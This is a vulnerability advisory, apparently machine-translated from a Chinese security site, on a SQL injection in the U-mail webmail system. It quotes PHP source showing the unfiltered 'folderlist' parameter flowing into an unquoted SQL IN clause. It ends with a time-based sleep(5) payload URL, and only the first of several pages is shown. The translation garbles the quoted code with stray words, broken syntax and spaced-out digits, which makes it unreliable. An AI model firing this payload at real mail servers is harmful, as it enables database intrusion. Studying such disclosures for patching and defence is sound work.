U-mail Mail Service system to the latest version 3 SQL injection vulnerability package-vulnerability warning-the black bar safety net

2015-02-20T00:00:00
ID MYHACK58:62201559249
Type myhack58
Reporter 佚名
Modified 2015-02-20T00:00:00

Description

Injection point 1:

\client\mail\module\views.php:

code area

if ( ACTION == "mail-compose" )

{

$draft_mail = gss( $_GET['draft'] );

$forward_mail = gss( $_GET['forward'] );

$reply_mail = gss( $_GET['reply'] );

$mailbox = gss( $_GET['mailbox'] );

$write_again = gss( $_GET['write_again'] );

$is_sendfile = gss( $_GET['sendfile'] );

$is_share = gss( $_GET['share'] );

....

if ( $is_share || $is_sendfile )

{

the include_once( LIB_PATH." Netdisk.php" );

$Netdisk = Netdisk::getinstance( );

$folder_list = trim( $_GET['folderlist'] ); //not filtered 1

$file_list = trim( $_GET['filelist'] );//not filtered 2:See tick-2 0 1 4-0 7 6 1 4 7

$file_all = array( );

...

if ( $folder_list )

{

$Netdisk->initTreeObject( $user_id, 0 );

$folder_list = explode( ",", $folder_list );

foreach ( $folder_list as $folder_id ) //split

{

$file_arr = $Netdisk->getAllFileByFolderID( $user_id, $folder_id, "file_id,file_name,file_size,folder_id", 0 );//follow up getAllFileByFolderID

$file_all = array_merge( $file_all, $file_arr );

}

}

public function getAllFileByFolderID( $_obfuscate_nQNptTJPg, $_obfuscate_zssh37DIFOEb, $_obfuscate_tjILu7ZH = "*", $_obfuscate_ySeUHBw = FALSE )

{

$_obfuscate_SD_daSU6LK1F2A = $this->Tree->get_child_id( $_obfuscate_zssh37DIFOEb );//follow up get_child_id, no impact, can be seen as a direct return

$_obfuscate_IRFhnYw = "user_id='".$ _obfuscate_nQNptTJPg."' AND folder_id IN (".$ _obfuscate_SD_daSU6LK1F2A.")";// Into the sql statement

$_obfuscate_6RYLWQ = $this->get_file( array( "fields" => $_obfuscate_tjILu7ZH, "where" => $_obfuscate_IRFhnYw, "orderby" => "file_name", "debug" => $_obfuscate_ySeUHBw ) );

return $_obfuscate_6RYLWQ;

}

public function get_child_id( $_obfuscate_qPyPrVFCFw "-1" )

{

if ( isset( $this->data_cache[$_obfuscate_qPyPrVFCFw) ) //$_obfuscate_qPyPrVFCFw can be controlled, can not enter the if

{

foreach ( $this->data_cache[$_obfuscate_qPyPrVFCFw] as $_obfuscate_kAoKz_kijKk => $_obfuscate_6RYLWQ)

{

$_obfuscate_qPyPrVFCFw= ",".$ this->get_child_id( $_obfuscate_kAoKz_kijKk);

}

}

return $_obfuscate_qPyPrVFCFw;//directly return

}

get_child_id function can be regarded as no effect, back to the getAllFileByFolderID function, the second parameter and finally into the sql statement without the quotation marks protection, the injected generation. payload:

code area

http://mail. domain. com:8 0 8 0/webmail/client/mail/index. php? module=view&action=mail-compose&share=1&folderlist=sleep(5)

! [1. png](http://hackdig-h.stor.sinaapp.com/pictures/month_1502/201502171221291230.png)

[1] [2] [3] [4] [5] next